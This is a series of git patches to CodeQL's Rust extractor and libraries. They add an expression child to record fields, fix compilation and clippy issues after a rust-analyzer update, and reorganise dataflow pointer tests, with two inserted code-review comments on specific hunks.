a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll index 54301cd04ceb..ee97d8a4c601 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll 
@@ -903,12 +903,15 @@ private module Impl { private Element getImmediateChildOfRecordField( RecordField e, int index, string partialPredicateCall ) { - exists(int b, int bAstNode, int n, int nAttr, int nName, int nTypeRepr, int nVisibility | + exists( + int b, int bAstNode, int n, int nAttr, int nExpr, int nName, int nTypeRepr, int nVisibility + | b = 0 and bAstNode = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfAstNode(e, i, _)) | i) and n = bAstNode and nAttr = n + 1 + max(int i | i = -1 or exists(e.getAttr(i)) | i) and - nName = nAttr + 1 and + nExpr = nAttr + 1 and + nName = nExpr + 1 and nTypeRepr = nName + 1 and nVisibility = nTypeRepr + 1 and ( @@ -919,7 +922,9 @@ private module Impl { result = e.getAttr(index - n) and partialPredicateCall = "Attr(" + (index - n).toString() + ")" or - index = nAttr and result = e.getName() and partialPredicateCall = "Name()" + index = nAttr and result = e.getExpr() and partialPredicateCall = "Expr()" + or + index = nExpr and result = e.getName() and partialPredicateCall = "Name()" or index = nName and result = e.getTypeRepr() and partialPredicateCall = "TypeRepr()" or diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll index 4e4abb2ae679..a858c89ce57c 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll @@ -786,6 +786,11 @@ module Raw { */ Attr getAttr(int index) { record_field_attrs(this, index, result) } + /** + * Gets the expression of this record field, if it exists. + */ + Expr getExpr() { record_field_exprs(this, result) } + /** * Gets the name of this record field, if it exists. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordField.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordField.qll index aa840aafdcdf..c60261128a1e 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordField.qll 
+++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordField.qll @@ -8,6 +8,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.AstNodeImpl::Impl as AstNodeImpl import codeql.rust.elements.Attr +import codeql.rust.elements.Expr import codeql.rust.elements.Name import codeql.rust.elements.TypeRepr import codeql.rust.elements.Visibility @@ -48,6 +49,19 @@ module Generated { */ final int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } + /** + * Gets the expression of this record field, if it exists. + */ + Expr getExpr() { + result = + Synth::convertExprFromRaw(Synth::convertRecordFieldToRaw(this).(Raw::RecordField).getExpr()) + } + + /** + * Holds if `getExpr()` exists. + */ + final predicate hasExpr() { exists(this.getExpr()) } + /** * Gets the name of this record field, if it exists. */ diff --git a/rust/ql/lib/rust.dbscheme b/rust/ql/lib/rust.dbscheme index bbe668c56ea9..29a351d42ac6 100644 --- a/rust/ql/lib/rust.dbscheme +++ b/rust/ql/lib/rust.dbscheme @@ -836,6 +836,12 @@ record_field_attrs( int attr: @attr ref ); +#keyset[id] +record_field_exprs( + int id: @record_field ref, + int expr: @expr ref +); + #keyset[id] record_field_names( int id: @record_field ref, diff --git a/rust/ql/test/extractor-tests/generated/RecordField/RecordField.ql b/rust/ql/test/extractor-tests/generated/RecordField/RecordField.ql index 6cb0510df2c1..d338dec4c35b 100644 --- a/rust/ql/test/extractor-tests/generated/RecordField/RecordField.ql +++ b/rust/ql/test/extractor-tests/generated/RecordField/RecordField.ql 
@@ -2,13 +2,16 @@ import codeql.rust.elements import TestUtils -from RecordField x, int getNumberOfAttrs, string hasName, string hasTypeRepr, string hasVisibility +from + RecordField x, int getNumberOfAttrs, string hasExpr, string hasName, string hasTypeRepr, + string hasVisibility where toBeTested(x) and not x.isUnknown() and getNumberOfAttrs = x.getNumberOfAttrs() and + (if x.hasExpr() then hasExpr = "yes" else hasExpr = "no") and (if x.hasName() then hasName = "yes" else hasName = "no") and (if x.hasTypeRepr() then hasTypeRepr = "yes" else hasTypeRepr = "no") and if x.hasVisibility() then hasVisibility = "yes" else hasVisibility = "no" -select x, "getNumberOfAttrs:", getNumberOfAttrs, "hasName:", hasName, "hasTypeRepr:", hasTypeRepr, - "hasVisibility:", hasVisibility +select x, "getNumberOfAttrs:", getNumberOfAttrs, "hasExpr:", hasExpr, "hasName:", hasName, + "hasTypeRepr:", hasTypeRepr, "hasVisibility:", hasVisibility diff --git a/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql b/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql new file mode 100644 index 000000000000..7519191f6b6a --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordField x +where toBeTested(x) and not x.isUnknown() +select x, x.getExpr() diff --git a/rust/schema/ast.py b/rust/schema/ast.py index d987cbb26a6f..6617749258cf 100644 --- a/rust/schema/ast.py +++ b/rust/schema/ast.py @@ -535,6 +535,7 @@ class RecordExprFieldList(AstNode, ): class RecordField(AstNode, ): attrs: list["Attr"] | child + expr: optional["Expr"] | child name: optional["Name"] | child type_repr: optional["TypeRepr"] | child visibility: optional["Visibility"] | child From bfcf9ea606f07259c5c8c6c17d9749e2623395a8 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:37:00 +0100 Subject: [PATCH 033/892] Rust: fix compilation errors after `rust-anlyzer` update --- rust/extractor/src/config.rs | 4 ++-- rust/extractor/src/rust_analyzer.rs | 1 + rust/extractor/src/translate/base.rs | 2 +- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/rust/extractor/src/config.rs b/rust/extractor/src/config.rs index 24fef22cff08..f8094c07a6c9 100644 --- a/rust/extractor/src/config.rs +++ b/rust/extractor/src/config.rs @@ -106,7 +106,7 @@ impl Config { let sysroot_src_input = self.sysroot_src.as_ref().map(|p| join_path_buf(dir, p)); match (sysroot_input, sysroot_src_input) { (None, None) => Sysroot::discover(dir, &self.cargo_extra_env), - (Some(sysroot), None) => Sysroot::discover_sysroot_src_dir(sysroot), + (Some(sysroot), None) => Sysroot::discover_rust_lib_src_dir(sysroot), (None, Some(sysroot_src)) => { Sysroot::discover_with_src_override(dir, &self.cargo_extra_env, sysroot_src) } @@ -130,7 +130,7 @@ impl Config { ( CargoConfig { all_targets: self.cargo_all_targets, - sysroot_src: sysroot.src_root().map(ToOwned::to_owned), + sysroot_src: sysroot.rust_lib_src_root().map(ToOwned::to_owned), rustc_source: self .rustc_src .as_ref() diff --git a/rust/extractor/src/rust_analyzer.rs b/rust/extractor/src/rust_analyzer.rs index f0ca9a223207..ee509c6fae78 100644 --- a/rust/extractor/src/rust_analyzer.rs +++ b/rust/extractor/src/rust_analyzer.rs @@ -297,4 +297,5 @@ pub(crate) fn path_to_file_id(path: &Path, vfs: &Vfs) -> Option { .and_then(|x| AbsPathBuf::try_from(x).ok()) .map(VfsPath::from) .and_then(|x| vfs.file_id(&x)) + .map(|(id, _excluded)| id) } diff --git a/rust/extractor/src/translate/base.rs b/rust/extractor/src/translate/base.rs index 6618feae4c20..2faeb12ea835 100644 --- a/rust/extractor/src/translate/base.rs +++ b/rust/extractor/src/translate/base.rs 
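Review bot: In `path_to_file_id` (rust/extractor/src/rust_analyzer.rs) the added `.map(|(id, _excluded)| id)` discards the second element of what `vfs.file_id` now returns, and no comment explains why. If that element is the exclusion marker its binding name suggests, a path the VFS reports as excluded still yields a file id, so callers cannot tell it apart from an included file. Either filter on that element before the `map`, or record the decision next to it, for example `// exclusion flag deliberately ignored: callers decide which files to extract`. The function begins above the hunk, so the start of the chain is not visible here.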
@@ -417,7 +417,7 @@ impl<'a> Translator<'a> { } } ItemContainer::Module(it) => self.canonical_path_from_hir_module(it), - ItemContainer::ExternBlock() | ItemContainer::Crate(_) => Some("".to_owned()), + ItemContainer::ExternBlock(..) | ItemContainer::Crate(..) => Some("".to_owned()), }?; Some(format!("{prefix}::{name}")) } From d9ecb6255e8fc199a43cf1f9ad1e65aea2bc5b01 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:41:34 +0100 Subject: [PATCH 034/892] Shared: fix clippy warning --- shared/tree-sitter-extractor/src/generator/mod.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/shared/tree-sitter-extractor/src/generator/mod.rs b/shared/tree-sitter-extractor/src/generator/mod.rs index ea41f3190e61..d972e9fb128d 100644 --- a/shared/tree-sitter-extractor/src/generator/mod.rs +++ b/shared/tree-sitter-extractor/src/generator/mod.rs @@ -234,7 +234,7 @@ fn add_field_for_column_storage<'a>( /// 1. A vector of dbscheme entries. /// 2. A set of names of the members of the `_ast_node` union. /// 3. A map where the keys are the dbscheme names for token kinds, and the -/// values are their integer representations. +/// values are their integer representations. fn convert_nodes( nodes: &node_types::NodeTypeMap, ) -> (Vec, Set<&str>, Map<&str, usize>) { From 51ae7c6b8ce764f2baa1bae14eaf7cfa9a55fe8e Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Mon, 24 Feb 2025 13:18:00 +0100 Subject: [PATCH 035/892] Rust: Reorganize pointers tests and add additional tests --- .../library-tests/dataflow/global/main.rs | 35 +- .../dataflow/pointers/inline-flow.expected | 321 ++++++++++-------- .../library-tests/dataflow/pointers/main.rs | 289 ++++++++++++---- 3 files changed, 398 insertions(+), 247 deletions(-) diff --git a/rust/ql/test/library-tests/dataflow/global/main.rs b/rust/ql/test/library-tests/dataflow/global/main.rs index 5899733af79b..a9d26e46b073 100644 --- a/rust/ql/test/library-tests/dataflow/global/main.rs 
+++ b/rust/ql/test/library-tests/dataflow/global/main.rs @@ -64,11 +64,11 @@ struct MyFlag { } impl MyFlag { - fn data_in(&self, n: i64) { + fn data_in(self, n: i64) { sink(n); // $ hasValueFlow=1 hasValueFlow=8 } - fn get_data(&self) -> i64 { + fn get_data(self) -> i64 { if self.flag { 0 } else { @@ -76,7 +76,7 @@ impl MyFlag { } } - fn data_through(&self, n: i64) -> i64 { + fn data_through(self, n: i64) -> i64 { if self.flag { 0 } else { @@ -107,13 +107,13 @@ fn data_through_method() { fn data_in_to_method_called_as_function() { let mn = MyFlag { flag: true }; let a = source(8); - MyFlag::data_in(&mn, a); + MyFlag::data_in(mn, a); } fn data_through_method_called_as_function() { let mn = MyFlag { flag: true }; let a = source(12); - let b = MyFlag::data_through(&mn, a); + let b = MyFlag::data_through(mn, a); sink(b); // $ hasValueFlow=12 } @@ -223,29 +223,6 @@ fn test_async_await() { futures::executor::block_on(test_async_await_async_part()); } -// Flow out of mutable parameters. - -fn set_int(n: &mut i64, c: i64) { - *n = c; -} - -fn mutates_argument_1() { - // Passing an already borrowed value to a function and then reading from the same borrow. - let mut n = 0; - let m = &mut n; - sink(*m); - set_int(m, source(37)); - sink(*m); // $ hasValueFlow=37 -} - -fn mutates_argument_2() { - // Borrowing at the call and then reading from the unborrowed variable. - let mut n = 0; - sink(n); - set_int(&mut n, source(88)); - sink(n); // $ MISSING: hasValueFlow=88 -} - fn main() { data_out_of_call(); data_in_to_call(); @@ -258,6 +235,4 @@ fn main() { test_operator_overloading(); test_async_await(); - mutates_argument_1(); - mutates_argument_2(); } diff --git a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected index 66d5c1ad666a..97d5a62618db 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected 
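Review bot: The `MyFlag` methods in dataflow/global/main.rs (`data_in`, `get_data`, `data_through`) switch from `&self` to `self`, and the file does not say why the receivers are by value. Judging by the commit title, this keeps reference flow out of the global test, so a comment above `impl MyFlag` would stop a later edit from reintroducing borrows, for example `// Receivers are taken by value on purpose; flow through references is covered in dataflow/pointers.` Each call now moves its `MyFlag`, so unless the struct is `Copy` (its definition is outside the hunk) a value can serve only one call.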
@@ -1,154 +1,179 @@ models edges -| main.rs:13:9:13:9 | a | main.rs:14:14:14:14 | a | provenance | | -| main.rs:13:13:13:22 | source(...) | main.rs:13:9:13:9 | a | provenance | | -| main.rs:14:9:14:9 | b [&ref] | main.rs:15:14:15:14 | b [&ref] | provenance | | -| main.rs:14:13:14:14 | &a [&ref] | main.rs:14:9:14:9 | b [&ref] | provenance | | -| main.rs:14:14:14:14 | a | main.rs:14:13:14:14 | &a [&ref] | provenance | | -| main.rs:15:9:15:9 | c | main.rs:16:10:16:10 | c | provenance | | -| main.rs:15:13:15:14 | * ... | main.rs:15:9:15:9 | c | provenance | | -| main.rs:15:14:15:14 | b [&ref] | main.rs:15:13:15:14 | * ... | provenance | | -| main.rs:31:6:31:6 | [post] b [&ref] | main.rs:32:11:32:11 | b [&ref] | provenance | | -| main.rs:31:10:31:19 | source(...) | main.rs:31:6:31:6 | [post] b [&ref] | provenance | | -| main.rs:32:11:32:11 | b [&ref] | main.rs:32:10:32:11 | * ... | provenance | | -| main.rs:37:25:37:26 | &... [&ref] | main.rs:37:26:37:26 | n | provenance | | -| main.rs:37:25:37:32 | ...: ... [&ref] | main.rs:37:25:37:26 | &... [&ref] | provenance | | -| main.rs:37:26:37:26 | n | main.rs:38:10:38:10 | n | provenance | | -| main.rs:42:9:42:11 | val | main.rs:43:27:43:29 | val | provenance | | -| main.rs:42:15:42:24 | source(...) | main.rs:42:9:42:11 | val | provenance | | -| main.rs:43:26:43:29 | &val [&ref] | main.rs:37:25:37:32 | ...: ... [&ref] | provenance | | -| main.rs:43:27:43:29 | val | main.rs:43:26:43:29 | &val [&ref] | provenance | | -| main.rs:50:13:50:13 | a | main.rs:51:13:51:17 | ref p | provenance | | -| main.rs:50:17:50:26 | source(...) | main.rs:50:13:50:13 | a | provenance | | -| main.rs:51:13:51:17 | ref p | main.rs:51:17:51:17 | p [&ref] | provenance | | -| main.rs:51:17:51:17 | p [&ref] | main.rs:52:15:52:15 | p [&ref] | provenance | | -| main.rs:52:15:52:15 | p [&ref] | main.rs:52:14:52:15 | * ... 
| provenance | | -| main.rs:56:13:56:21 | ref mut a | main.rs:56:21:56:21 | a [&ref] | provenance | | -| main.rs:56:21:56:21 | a [&ref] | main.rs:57:15:57:15 | a [&ref] | provenance | | -| main.rs:56:25:56:34 | source(...) | main.rs:56:13:56:21 | ref mut a | provenance | | -| main.rs:57:15:57:15 | a [&ref] | main.rs:57:14:57:15 | * ... | provenance | | -| main.rs:63:13:63:13 | a [Some] | main.rs:64:23:64:23 | a [Some] | provenance | | -| main.rs:63:17:63:32 | Some(...) [Some] | main.rs:63:13:63:13 | a [Some] | provenance | | -| main.rs:63:22:63:31 | source(...) | main.rs:63:17:63:32 | Some(...) [Some] | provenance | | -| main.rs:64:23:64:23 | a [Some] | main.rs:65:13:65:23 | Some(...) [Some] | provenance | | -| main.rs:65:13:65:23 | Some(...) [Some] | main.rs:65:18:65:22 | ref p | provenance | | -| main.rs:65:18:65:22 | ref p | main.rs:65:22:65:22 | p [&ref] | provenance | | -| main.rs:65:22:65:22 | p [&ref] | main.rs:65:34:65:34 | p [&ref] | provenance | | -| main.rs:65:34:65:34 | p [&ref] | main.rs:65:33:65:34 | * ... | provenance | | -| main.rs:76:18:76:21 | SelfParam [MyNumber] | main.rs:77:15:77:18 | self [MyNumber] | provenance | | -| main.rs:77:15:77:18 | self [MyNumber] | main.rs:78:13:78:38 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:78:13:78:38 | ...::MyNumber(...) [MyNumber] | main.rs:78:32:78:37 | number | provenance | | -| main.rs:78:32:78:37 | number | main.rs:76:31:80:5 | { ... } | provenance | | -| main.rs:82:19:82:23 | SelfParam [&ref, MyNumber] | main.rs:83:15:83:18 | self [&ref, MyNumber] | provenance | | -| main.rs:83:15:83:18 | self [&ref, MyNumber] | main.rs:84:13:84:39 | &... [&ref, MyNumber] | provenance | | -| main.rs:84:13:84:39 | &... [&ref, MyNumber] | main.rs:84:14:84:39 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:84:14:84:39 | ...::MyNumber(...) [MyNumber] | main.rs:84:33:84:38 | number | provenance | | -| main.rs:84:33:84:38 | number | main.rs:82:33:86:5 | { ... 
} | provenance | | -| main.rs:90:9:90:17 | my_number [MyNumber] | main.rs:91:10:91:18 | my_number [MyNumber] | provenance | | -| main.rs:90:21:90:50 | ...::MyNumber(...) [MyNumber] | main.rs:90:9:90:17 | my_number [MyNumber] | provenance | | -| main.rs:90:40:90:49 | source(...) | main.rs:90:21:90:50 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:91:10:91:18 | my_number [MyNumber] | main.rs:76:18:76:21 | SelfParam [MyNumber] | provenance | | -| main.rs:91:10:91:18 | my_number [MyNumber] | main.rs:91:10:91:30 | my_number.to_number(...) | provenance | | -| main.rs:100:9:100:17 | my_number [&ref, MyNumber] | main.rs:101:10:101:18 | my_number [&ref, MyNumber] | provenance | | -| main.rs:100:21:100:51 | &... [&ref, MyNumber] | main.rs:100:9:100:17 | my_number [&ref, MyNumber] | provenance | | -| main.rs:100:22:100:51 | ...::MyNumber(...) [MyNumber] | main.rs:100:21:100:51 | &... [&ref, MyNumber] | provenance | | -| main.rs:100:41:100:50 | source(...) | main.rs:100:22:100:51 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:101:10:101:18 | my_number [&ref, MyNumber] | main.rs:82:19:82:23 | SelfParam [&ref, MyNumber] | provenance | | -| main.rs:101:10:101:18 | my_number [&ref, MyNumber] | main.rs:101:10:101:31 | my_number.get_number(...) | provenance | | -| main.rs:105:9:105:9 | a [&ref, tuple.0] | main.rs:108:19:108:19 | a [&ref, tuple.0] | provenance | | -| main.rs:105:13:105:28 | &... [&ref, tuple.0] | main.rs:105:9:105:9 | a [&ref, tuple.0] | provenance | | -| main.rs:105:14:105:28 | TupleExpr [tuple.0] | main.rs:105:13:105:28 | &... [&ref, tuple.0] | provenance | | -| main.rs:105:15:105:24 | source(...) | main.rs:105:14:105:28 | TupleExpr [tuple.0] | provenance | | -| main.rs:108:9:108:9 | b | main.rs:111:10:111:10 | b | provenance | | -| main.rs:108:19:108:19 | a [&ref, tuple.0] | main.rs:109:9:109:15 | &... [&ref, tuple.0] | provenance | | -| main.rs:109:9:109:15 | &... 
[&ref, tuple.0] | main.rs:109:10:109:15 | TuplePat [tuple.0] | provenance | | -| main.rs:109:10:109:15 | TuplePat [tuple.0] | main.rs:109:11:109:11 | n | provenance | | -| main.rs:109:11:109:11 | n | main.rs:108:9:108:9 | b | provenance | | +| main.rs:17:13:17:13 | a | main.rs:18:18:18:18 | a | provenance | | +| main.rs:17:17:17:26 | source(...) | main.rs:17:13:17:13 | a | provenance | | +| main.rs:18:13:18:13 | b [&ref] | main.rs:19:18:19:18 | b [&ref] | provenance | | +| main.rs:18:17:18:18 | &a [&ref] | main.rs:18:13:18:13 | b [&ref] | provenance | | +| main.rs:18:18:18:18 | a | main.rs:18:17:18:18 | &a [&ref] | provenance | | +| main.rs:19:13:19:13 | c | main.rs:20:14:20:14 | c | provenance | | +| main.rs:19:17:19:18 | * ... | main.rs:19:13:19:13 | c | provenance | | +| main.rs:19:18:19:18 | b [&ref] | main.rs:19:17:19:18 | * ... | provenance | | +| main.rs:23:29:23:30 | &... [&ref] | main.rs:23:30:23:30 | n | provenance | | +| main.rs:23:29:23:36 | ...: ... [&ref] | main.rs:23:29:23:30 | &... [&ref] | provenance | | +| main.rs:23:30:23:30 | n | main.rs:24:14:24:14 | n | provenance | | +| main.rs:28:13:28:15 | val | main.rs:29:31:29:33 | val | provenance | | +| main.rs:28:19:28:28 | source(...) | main.rs:28:13:28:15 | val | provenance | | +| main.rs:29:30:29:33 | &val [&ref] | main.rs:23:29:23:36 | ...: ... [&ref] | provenance | | +| main.rs:29:31:29:33 | val | main.rs:29:30:29:33 | &val [&ref] | provenance | | +| main.rs:33:13:33:13 | a [&ref, tuple.0] | main.rs:36:23:36:23 | a [&ref, tuple.0] | provenance | | +| main.rs:33:17:33:32 | &... [&ref, tuple.0] | main.rs:33:13:33:13 | a [&ref, tuple.0] | provenance | | +| main.rs:33:18:33:32 | TupleExpr [tuple.0] | main.rs:33:17:33:32 | &... [&ref, tuple.0] | provenance | | +| main.rs:33:19:33:28 | source(...) | main.rs:33:18:33:32 | TupleExpr [tuple.0] | provenance | | +| main.rs:36:13:36:13 | b | main.rs:39:14:39:14 | b | provenance | | +| main.rs:36:23:36:23 | a [&ref, tuple.0] | main.rs:37:13:37:19 | &... 
[&ref, tuple.0] | provenance | | +| main.rs:37:13:37:19 | &... [&ref, tuple.0] | main.rs:37:14:37:19 | TuplePat [tuple.0] | provenance | | +| main.rs:37:14:37:19 | TuplePat [tuple.0] | main.rs:37:15:37:15 | n | provenance | | +| main.rs:37:15:37:15 | n | main.rs:36:13:36:13 | b | provenance | | +| main.rs:51:13:51:13 | a | main.rs:52:13:52:17 | ref p | provenance | | +| main.rs:51:17:51:26 | source(...) | main.rs:51:13:51:13 | a | provenance | | +| main.rs:52:13:52:17 | ref p | main.rs:52:17:52:17 | p [&ref] | provenance | | +| main.rs:52:17:52:17 | p [&ref] | main.rs:53:15:53:15 | p [&ref] | provenance | | +| main.rs:53:15:53:15 | p [&ref] | main.rs:53:14:53:15 | * ... | provenance | | +| main.rs:57:13:57:13 | a [Some] | main.rs:58:15:58:15 | a [Some] | provenance | | +| main.rs:57:17:57:32 | Some(...) [Some] | main.rs:57:13:57:13 | a [Some] | provenance | | +| main.rs:57:22:57:31 | source(...) | main.rs:57:17:57:32 | Some(...) [Some] | provenance | | +| main.rs:58:15:58:15 | a [Some] | main.rs:59:13:59:23 | Some(...) [Some] | provenance | | +| main.rs:59:13:59:23 | Some(...) [Some] | main.rs:59:18:59:22 | ref p | provenance | | +| main.rs:59:18:59:22 | ref p | main.rs:59:22:59:22 | p [&ref] | provenance | | +| main.rs:59:22:59:22 | p [&ref] | main.rs:59:34:59:34 | p [&ref] | provenance | | +| main.rs:59:34:59:34 | p [&ref] | main.rs:59:33:59:34 | * ... | provenance | | +| main.rs:73:10:73:10 | [post] b [&ref] | main.rs:74:15:74:15 | b [&ref] | provenance | | +| main.rs:73:14:73:23 | source(...) | main.rs:73:10:73:10 | [post] b [&ref] | provenance | | +| main.rs:74:15:74:15 | b [&ref] | main.rs:74:14:74:15 | * ... | provenance | | +| main.rs:105:10:105:10 | [post] c [&ref] | main.rs:106:15:106:15 | c [&ref] | provenance | | +| main.rs:105:14:105:23 | source(...) | main.rs:105:10:105:10 | [post] c [&ref] | provenance | | +| main.rs:106:15:106:15 | c [&ref] | main.rs:106:14:106:15 | * ... 
| provenance | | +| main.rs:112:13:112:21 | ref mut a | main.rs:112:21:112:21 | a [&ref] | provenance | | +| main.rs:112:21:112:21 | a [&ref] | main.rs:113:15:113:15 | a [&ref] | provenance | | +| main.rs:112:25:112:34 | source(...) | main.rs:112:13:112:21 | ref mut a | provenance | | +| main.rs:113:15:113:15 | a [&ref] | main.rs:113:14:113:15 | * ... | provenance | | +| main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:157:15:157:18 | self [MyNumber] | provenance | | +| main.rs:157:15:157:18 | self [MyNumber] | main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | main.rs:158:32:158:37 | number | provenance | | +| main.rs:158:32:158:37 | number | main.rs:156:31:160:5 | { ... } | provenance | | +| main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:163:15:163:18 | self [&ref, MyNumber] | provenance | | +| main.rs:163:15:163:18 | self [&ref, MyNumber] | main.rs:164:13:164:39 | &... [&ref, MyNumber] | provenance | | +| main.rs:164:13:164:39 | &... [&ref, MyNumber] | main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | main.rs:164:33:164:38 | number | provenance | | +| main.rs:164:33:164:38 | number | main.rs:162:26:166:5 | { ... } | provenance | | +| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:175:14:175:22 | my_number [MyNumber] | provenance | | +| main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | main.rs:174:13:174:21 | my_number [MyNumber] | provenance | | +| main.rs:174:44:174:53 | source(...) | main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | provenance | | +| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:175:14:175:34 | my_number.to_number(...) 
| provenance | | +| main.rs:179:13:179:21 | my_number [MyNumber] | main.rs:180:16:180:24 | my_number [MyNumber] | provenance | | +| main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | main.rs:179:13:179:21 | my_number [MyNumber] | provenance | | +| main.rs:179:44:179:53 | source(...) | main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | +| main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:180:14:180:31 | ... .get(...) | provenance | | +| main.rs:180:16:180:24 | my_number [MyNumber] | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | provenance | | +| main.rs:200:29:200:38 | ...: i64 | main.rs:201:14:201:18 | value | provenance | | +| main.rs:201:10:201:10 | [post] n [&ref] | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | provenance | | +| main.rs:201:14:201:18 | value | main.rs:201:10:201:10 | [post] n [&ref] | provenance | | +| main.rs:210:17:210:17 | [post] p [&ref] | main.rs:211:15:211:15 | p [&ref] | provenance | | +| main.rs:210:20:210:29 | source(...) | main.rs:200:29:200:38 | ...: i64 | provenance | | +| main.rs:210:20:210:29 | source(...) | main.rs:210:17:210:17 | [post] p [&ref] | provenance | | +| main.rs:211:15:211:15 | p [&ref] | main.rs:211:14:211:15 | * ... | provenance | | nodes -| main.rs:13:9:13:9 | a | semmle.label | a | -| main.rs:13:13:13:22 | source(...) | semmle.label | source(...) | -| main.rs:14:9:14:9 | b [&ref] | semmle.label | b [&ref] | -| main.rs:14:13:14:14 | &a [&ref] | semmle.label | &a [&ref] | -| main.rs:14:14:14:14 | a | semmle.label | a | -| main.rs:15:9:15:9 | c | semmle.label | c | -| main.rs:15:13:15:14 | * ... | semmle.label | * ... | -| main.rs:15:14:15:14 | b [&ref] | semmle.label | b [&ref] | -| main.rs:16:10:16:10 | c | semmle.label | c | -| main.rs:31:6:31:6 | [post] b [&ref] | semmle.label | [post] b [&ref] | -| main.rs:31:10:31:19 | source(...) 
| semmle.label | source(...) | -| main.rs:32:10:32:11 | * ... | semmle.label | * ... | -| main.rs:32:11:32:11 | b [&ref] | semmle.label | b [&ref] | -| main.rs:37:25:37:26 | &... [&ref] | semmle.label | &... [&ref] | -| main.rs:37:25:37:32 | ...: ... [&ref] | semmle.label | ...: ... [&ref] | -| main.rs:37:26:37:26 | n | semmle.label | n | -| main.rs:38:10:38:10 | n | semmle.label | n | -| main.rs:42:9:42:11 | val | semmle.label | val | -| main.rs:42:15:42:24 | source(...) | semmle.label | source(...) | -| main.rs:43:26:43:29 | &val [&ref] | semmle.label | &val [&ref] | -| main.rs:43:27:43:29 | val | semmle.label | val | -| main.rs:50:13:50:13 | a | semmle.label | a | -| main.rs:50:17:50:26 | source(...) | semmle.label | source(...) | -| main.rs:51:13:51:17 | ref p | semmle.label | ref p | -| main.rs:51:17:51:17 | p [&ref] | semmle.label | p [&ref] | -| main.rs:52:14:52:15 | * ... | semmle.label | * ... | -| main.rs:52:15:52:15 | p [&ref] | semmle.label | p [&ref] | -| main.rs:56:13:56:21 | ref mut a | semmle.label | ref mut a | -| main.rs:56:21:56:21 | a [&ref] | semmle.label | a [&ref] | -| main.rs:56:25:56:34 | source(...) | semmle.label | source(...) | -| main.rs:57:14:57:15 | * ... | semmle.label | * ... | -| main.rs:57:15:57:15 | a [&ref] | semmle.label | a [&ref] | -| main.rs:63:13:63:13 | a [Some] | semmle.label | a [Some] | -| main.rs:63:17:63:32 | Some(...) [Some] | semmle.label | Some(...) [Some] | -| main.rs:63:22:63:31 | source(...) | semmle.label | source(...) | -| main.rs:64:23:64:23 | a [Some] | semmle.label | a [Some] | -| main.rs:65:13:65:23 | Some(...) [Some] | semmle.label | Some(...) [Some] | -| main.rs:65:18:65:22 | ref p | semmle.label | ref p | -| main.rs:65:22:65:22 | p [&ref] | semmle.label | p [&ref] | -| main.rs:65:33:65:34 | * ... | semmle.label | * ... | -| main.rs:65:34:65:34 | p [&ref] | semmle.label | p [&ref] | -| main.rs:76:18:76:21 | SelfParam [MyNumber] | semmle.label | SelfParam [MyNumber] | -| main.rs:76:31:80:5 | { ... 
